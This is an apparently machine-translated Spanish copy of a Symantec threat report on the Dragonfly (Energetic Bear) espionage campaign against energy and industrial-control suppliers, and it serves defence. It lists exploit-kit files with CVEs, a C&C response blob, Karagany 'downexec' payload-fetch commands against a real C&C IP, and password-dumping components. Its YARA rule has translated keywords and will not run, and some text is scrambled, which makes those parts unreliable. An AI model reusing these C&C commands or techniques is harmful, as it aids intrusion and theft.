Documentos de Académico
Documentos de Profesional
Documentos de Cultura
RESPUESTA DE SEGURIDAD
El grupo Dragonfly, que también es conocido por otros vendedores como Energetic Bear, es
un grupo capaz que evoluciona con el tiempo y se dirige principalmente al sector de la
energía y las industrias relacionadas. Llevan operando al menos desde 2011, pero es
posible que lleven activos incluso más tiempo. Dragonfly se dirigió inicialmente a
empresas de defensa y aviación en EE.UU.
y Canadá antes de centrarse en empresas energéticas estadounidenses y europeas a
principios de 2013. Entre sus objetivos más recientes figuran empresas relacionadas con
los sistemas de control industrial.
Un nuevo enfoque
utilizado por los
atacantes consiste en
comprometer el sitio
de actualización de
varios productores de
software para sistemas
de control industrial
(ICS).
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Cronología
Symantec observó intentos de spear phishing en forma de correos electrónicos con archivos PDF
adjuntos desde febrero de 2013 hasta junio de 2013. Los temas de los correos electrónicos estaban
relacionados con cuestiones de administración de oficina, como la gestión de una cuenta o problemas con
una entrega. Los objetivos identificados de esta campaña eran principalmente organizaciones
estadounidenses y británicas del sector energético.
En mayo de 2013, los atacantes comenzaron a utilizar el kit de exploits Lightsout como vector de ataque,
redirigiendo a los objetivos desde varios sitios web. El uso del kit de exploits Lightsout ha continuado hasta la
fecha, aunque de forma intermitente. El kit de exploits se ha ido actualizando con el tiempo con técnicas de
ofuscación. La versión actualizada de Lightsout pasó a conocerse como Hello exploit kit.
Un enfoque más reciente utilizado por los atacantes consiste en comprometer el sitio de actualización de
varios productores de software de sistemas de control industrial (ICS). A continuación, incluyen
Backdoor.Oldrea en una actualización legítima del software afectado. Hasta la fecha, se sabe que tres
productores de software ICS han sido comprometidos.
Los atacantes de Dragonfly utilizaron sitios web pirateados para alojar software de mando y control
(C&C). Los sitios web comprometidos parecen utilizar sistemáticamente algún tipo de sistema de gestión
de contenidos.
Víctimas
Los objetivos actuales del grupo Dragonfly, actividad maliciosa adicional- permite obtener una
basados en sitios web comprometidos y imagen más precisa de las "verdaderas" víctimas.
actualizaciones de software secuestradas, Las infecciones más activas, como en la figura 2, son
son el sector energético y los sistemas de
control industrial, en particular los basados
en Europa. Aunque la mayoría de las
víctimas se encuentran en Estados Unidos,
parece que se trata de daños colaterales. Es
decir, muchos de estos ordenadores fueron
probablemente infectados a través de
ataques de watering hole o secuestros de
actualizaciones y no son de interés para el
atacante.
El examen de las víctimas con infecciones
activas -en las que se ha detectado
Figura 2. Los 10 países con más infecciones activas
Página 5
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Herramientas y
tácticas
Dragonfly utiliza dos tipos principales de malware en sus ataques. Ambos son malware del tipo Herramienta de
Acceso Remoto (RAT) que proporcionan a los atacantes acceso y control de los ordenadores
comprometidos. La herramienta de malware favorita de Dragonfly es Backdoor.Oldrea, también conocida como
Havex o Energetic Bear RAT. Oldrea actúa como puerta trasera para los atacantes en el ordenador de la
víctima, permitiéndoles extraer datos e instalar más malware.
Oldrea parece ser un malware personalizado, escrito por el propio grupo o creado para él. Esto proporciona
alguna indicación de las capacidades y recursos que hay detrás del grupo Dragonfly. La segunda herramienta
principal utilizada por Dragonfly es Trojan.Karagany. A diferencia de Oldrea, Karagany estaba disponible en el
mercado clandestino. El código fuente de la versión 1 de Karagany se filtró en 2010. Symantec cree que
Dragonfly puede haber tomado este código fuente y haberlo modificado para su propio uso.
Symantec descubrió que la mayoría de los ordenadores comprometidos por los atacantes estaban infectados
con Oldrea. Karagany sólo se utilizó en alrededor del 5% de las infecciones. Las dos piezas de malware son
similares en funcionalidad y lo que lleva a los atacantes a elegir una herramienta sobre otra sigue siendo
desconocido.
Campaña de spam
El grupo Dragonfly ha
utilizado al menos tres
tácticas de infección contra
objetivos del sector
energético. El primer método
consistió en un ataque por
correo electrónico.
en la que algunos ejecutivos y
altos cargos de empresas objetivo
recibieron correos electrónicos
con un PDF malicioso adjunto.
Los correos electrónicos
infectados tenían uno de estos dos
asuntos "La cuenta"
o "Resolución de problema de
entrega". Todos los correos
procedían de una única dirección
de Gmail.
El gráfico 3 muestra el número de
destinatarios diferentes por día.
La campaña de spam
comenzó en febrero de 2013
y continuó
en junio de 2013. Symantec Figura 3. Actividad de las campañas de spam desde mediados de febrero de 2014
identificó siete hasta mediados de junio de 2013
organizaciones diferentes
como objetivos de este
campaña. Al menos una organización fue atacada de forma intermitente durante un periodo de 84 días.
Ataques a abrevaderos
En junio de 2013, los atacantes se centraron en los ataques de tipo watering hole. Atacaron varios sitios web
relacionados con la energía e inyectaron un iframe en cada uno de ellos. Este iframe redirigía a los visitantes
a otro sitio web legítimo comprometido que alojaba el exploit kit Lightsout. Éste, a su vez, explotaba Java o
Internet Explorer para introducir Oldrea o Karagany en el ordenador de la víctima. El hecho de que los
atacantes comprometieran varios sitios web legítimos en cada fase de la operación es una prueba más de
que el grupo tiene una gran capacidad técnica.
Página 6
Libélula: Ataques de ciberespionaje contra proveedores de
energía
En septiembre de
2013, Dragonfly
comenzó a utilizar una
nueva versión de este
conocido como Hello
exploit kit. La página de
aterrizaje de este kit
contiene JavaScript que
toma las huellas
dactilares del sistema,
identificando los
complementos
instalados en el
navegador. A
continuación, la víctima
es redirigida a una URL
que, a su vez, determina
el mejor exploit a utilizar
en función de la
información recopilada.
La figura 4 muestra los
sitios web Figura 4. Industrias objetivo a lo largo del tiempo
comprometidos
clasificados por
sectores. El cincuenta
por ciento de los
objetivos identificados
estaban relacionados
con la industria
energética y el treinta
por ciento eran
sistemas de control de energía, como se muestra en la figura 4. En marzo de 2014 se observa un claro cambio
en los objetivos de los atacantes, cuando los sistemas de control de la energía se convierten en el objetivo
principal.
Software troyanizado
El vector de ataque más ambicioso utilizado por Dragonfly fue el compromiso de una serie de paquetes de
software legítimos. Se atacó a tres proveedores diferentes de equipos ICS y se insertó malware en los
paquetes de software que habían puesto a disposición para su descarga en sus sitios web.
Página 7
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Conclusión
El grupo Dragonfly es técnicamente hábil y capaz de pensar estratégicamente. Dado el tamaño de algunos de
sus objetivos, el grupo encontró un "punto débil" comprometiendo a sus proveedores, que invariablemente
son empresas más pequeñas y menos protegidas.
Página 8
ANEXO
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Un ejemplo de la estructura del kit de exploits Lightsout puede verse en la Tabla 1. Nótese que los
nombres de los archivos y los exploits utilizados pueden variar.
En septiembre de Tabla 1. Ejemplos de nombres de archivos para una implementación del kit de explotación
2013, el grupo Lightsout
Dragonfly comenzó a
utilizar una nueva Página Descripción CVE
versión de Lightsout, Inden2i.php Primera página de destino N/A
también conocida Inden2i.html Segunda página de destino N/A
como Hello exploit kit. PluginDetect.js Script PluginDetect N/A
El JavaScript incluido
en la página de Stoh.html Java 6 exploit Jar request file N/A
destino redirige el Stoh.jar Exploit de Java 6 CVE-2012-1723
navegador a una URL Gami.html Java 7 exploit Jar request file N/A
que depende de las
Gami.jar Java 7 exploit CVE-2013-2465
fuentes instaladas en
el sistema, navegador Tubc.html Exploit de IE7 CVE-2012-4792
complementos, la versión Negc.html Exploit de IE8 CVE-2013-1347
del sistema operativo y el
agente de usuario. En
este punto, determina el
mejor exploit para
uso, basado en la
información proporcionada, y genera una URL apropiada para redirigir al usuario al exploit/payload apropiado.
A continuación se muestra un ejemplo de este tipo de solicitud:
[http://]compromised.example/wp-includes/pomo/
dtsrc.php?a=[EK _ PARAMETER _ DETERMINADO]
Página 10
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Backdoor.Oldrea
En el núcleo de Backdoor.Oldrea hay un componente persistente que interactúa con los servidores de C&C
para descargar y ejecutar cargas útiles. Los componentes se descargan llegando al servidor de C&C y
realizando una petición GET que devuelve una página HTML que contiene una cadena codificada en base64
entre dos comentarios marcados con la cadena 'havex'.
Instalación
Modificaciones del sistema de archivos
• %Temp%\qln.dbx
• %Sistema%\TMPprovider038.dll
Inyección de código
• Backdoor.Oldrea inyecta código en explorer.exe.
Red
Tras la infección, Backdoor.Oldrea intentará recopilar información del sistema, como el sistema operativo, el
nombre de usuario, el nombre del equipo, el país, el idioma, la nación, la información de configuración del
adaptador de Internet, las unidades disponibles, el navegador predeterminado, los procesos en ejecución, la
lista de archivos del escritorio, Mis documentos, el historial de Internet, los archivos de programa y la raíz de
las unidades disponibles. También recopila datos de Outlook (libreta de direcciones) y archivos de
configuración de software relacionados con ICS. Estos datos se recogen y se escriben en un archivo
temporal de forma encriptada antes de ser POST'ed a un servidor remoto de C&C. Los siguientes son
ejemplos de una solicitud POST y una respuesta POST:
Página 11
Libélula: Ataques de ciberespionaje contra proveedores de
energía
9f65
<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></
head><body>¡Sin datos!<!--
havexQlpoOTFBWSZTWWYvDI0BOsD////////////////////////////////////
/////////4oB+93VVXu69DuN7XYzds9yt49Ques
+yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD
M92D/8XckU4UJBmLwyNA==havex--></body></head>
Cargas útiles
Esta sección incluye información sobre las cargas útiles identificadas descargadas por
componente identificado:
• Tmpprovider es un componente persistente que interactúa con el servidor C&C (descarga y ejecuta payloads).
• El componente InstallerFormDll suele incrustar otro ejecutable (DLL) en su sección de recursos para
ser cargado. La muestra analizada llevaba una herramienta de recuperación de contraseñas para
navegadores web procedente de http://securityxploded.com/browser-password-decryptor.php.
• El componente RunExeCmdSingle es un archivo DLL que lanza y ejecuta otro ejecutable. La
exportación 'runDll' de este archivo es donde se implementa la lógica.
• DropCommandsCmd es un módulo de limpieza, utilizado para eliminar rastros de sí mismo del ordenador
infectado.
• Los módulos GetFileCmd comprueban la existencia de archivos específicos en el host infectado. Las dos
muestras buscan el archivo de software relacionado con ICS y el archivo de libreta de direcciones de
autocompletar de Outlook (outlook.nk2).
Página 12
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Trojan.Karagany
Trojan.Karagany es una puerta trasera utilizada principalmente para el reconocimiento. Está diseñada para
descargar e instalar archivos adicionales y filtrar datos. Las muestras a veces utilizan empaquetadores
binarios comunes como UPX y Aspack sobre un empaquetador/protector binario Delphi personalizado para la
carga útil. Cuando está presente en las muestras, el empaquetador Delphi está configurado para utilizar
"neosphere" como clave para descifrar la carga útil.
A continuación se ofrece un breve resumen de la funcionalidad de Trojan.Karagany:
• Puede cargar, descargar y ejecutar archivos en el sistema
• Tiene capacidad para plugins (puede cargar varios plugins para añadir funciones, como Web Injects).
• La carga útil tiene un tamaño aproximado de 72 Kb y está programada en C/C++.
• Contiene un pequeño archivo DLL incrustado que supervisa las API de envío y envío de
WSASend para capturar las credenciales de "autenticación básica".
Instalación
Trojan.Karagany crea una carpeta en el directorio APPDATA del usuario y elige el nombre del directorio de la
siguiente lista:
• Servicios WCF de Microsoft
• Servicios de intermediación
• Utilidades Flash
• Programas del Centro Multimedia
• Definiciones de las políticas
• Herramientas web de Microsoft
• Conjuntos de referencia
• Servicios de análisis
• Información sobre InstallShield
• IIS Servidor SQL
• Diagnóstico
• Rendimiento de NTAPI
• Plataforma WPF
Se copia en el directorio creado con atributos ocultos y de sistema utilizando un nombre de archivo
elegido de la siguiente lista:
• SearchIndexer.exe
• ImeBroker.exe
• fsutil.exe
• PnPutil.exe
• BdeUISrv.exe
• WinSAT.exe
• pwNative.exe
• SnippingTool.exe
• DFDWizard.exe
• PrintBrmEngine.exe
• WbemMonitor.exe
• dxpserver.exe
• PowerMng.exe
Página 13
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Trojan.Karagany se copia a sí mismo con atributos ocultos y del sistema donde se ejecutó por primera vez como
err.log[DIGITS]. A continuación, copia la utilidad chkdsk legítima en la carpeta de instalación utilizando el nombre
de archivo de la carga útil pero con un espacio antes de la extensión del archivo. Esto puede engañar a los
usuarios normales haciéndoles creer que esta carpeta contiene una aplicación legítima, por ejemplo PnPutil .exe.
Trojan.Karagany!gen1 puede crear los siguientes archivos adicionales en la carpeta de instalación:
• Formulario.api
• inact.api
• prog.cer
• Cent.api
• ie.pdb
A continuación, crea un directorio C:\ProgramData\Mail\MailAg\gl como un directorio temporal utilizado para cargar
archivos. Trojan.Karagany luego crea un enlace a sí mismo en la carpeta de inicio como un inicio automático
cuando se reinicia el sistema.
Red
Trojan.Karagany comprueba primero si hay una conexión a Internet activa visitando sitios web de Microsoft o
Adobe. Sólo se comunicará con su servidor de C&C cuando esta comprobación tenga éxito.
work:3|downexec [http://]93.188.161.235/check2/muees27jxt/shot.jpg;
work:5|downexec [http://]93.188.161.235/check2/muees27jxt/tl.jpg;
work:7|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
work:103|downexec [http://]93.188.161.235/check2/muees27jxt/pdump.jpg;
work:118|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
Página 14
Libélula: Ataques de ciberespionaje contra proveedores de
energía
Los datos POST contienen la versión del sistema operativo y un número derivado:
• identifiant=[VERSION SO]_[NÚMERO DERIVADO]
Los tokens de User-Agent utilizados en las peticiones de C&C están codificados. Se han observado los dos ejemplos
siguientes:
• Mozilla/17.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
Componentes descargados
• pdump.jpg - Se utiliza para volcar las contraseñas en \ProgramData\Mail\MailAg\pwds.txt. Necesita la biblioteca
'vaultcli.dll
• fl.txt - Se utiliza para listar archivos RTF, PST, DOC, XLS, PDF, *pass*.*, *secret*.* en
\ProgramData\Mail\MailAg\fls.txt
• tl.jpg - Se utiliza para listar las tareas en ejecución mediante la utilidad 'tasklist
• shot.jpg - Se utiliza para la captura de pantalla del escritorio, el archivo se guarda en
\ProgramData\Mail\MailAg\shot.png
Indicadores de compromiso
Backdoor.Oldrea
Trojan.Karagany
• 91.203.6.71
• 93.171.216.118
• 93.188.161.235
Regla de Yara
Gobierno de Karagany Yara:
norma privada isPE
{
estado:
uint16(0) == 0x5A4D y uint32(uint32(0x3c)) == 0x00004550
}
cuerdas:
$s1 = "neosphere" ascii ancho
$s2 = "10000000000051200" ascii ancho
$v1 = "&fichier" ascii ancho
$v2 = "&identifiant" ascii ancho
$c1 = "xmonstart" ascii ancho
$c2 = "xmonstop" ascii ancho
$c3 = "xgetfile" ascii ancho
$c4 = "downadminexec" ascii ancho
$c5 = "xdiex" ascii ancho
$c6 = "xrebootx" condición ascii
ancha:
isPE y (($s1 y $s2) o ($v1 y $v2) o (cualquiera de ($c*)))
}
Página 17
Autores
Respuesta de seguridad de Symantec
Acerca de Symantec
Symantec protege la información del mundo y es
líder mundial en soluciones de seguridad, copia de
seguridad y disponibilidad. Nuestros productos y servicios
innovadores protegen a las personas y la información en
cualquier entorno, desde el dispositivo móvil más pequeño
hasta el centro de datos de la empresa y los sistemas
basados en la nube.
Para conocer las oficinas de cada país y los números de contacto, visite nuestro sitio web.
Cualquier información técnica puesta a disposición por Symantec Corporation es obra protegida por derechos de autor de Symantec Corporation y es
propiedad de Symantec Corporation.
SIN GARANTÍA . La información técnica se suministra tal cual y Symantec Corporation no garantiza su exactitud ni su uso. Cualquier uso de la
documentación técnica o de la información aquí contenida es por cuenta y riesgo del usuario. La documentación puede incluir imprecisiones técnicas o
de otro tipo o errores tipográficos. Symantec se reserva el derecho a realizar cambios sin previo aviso.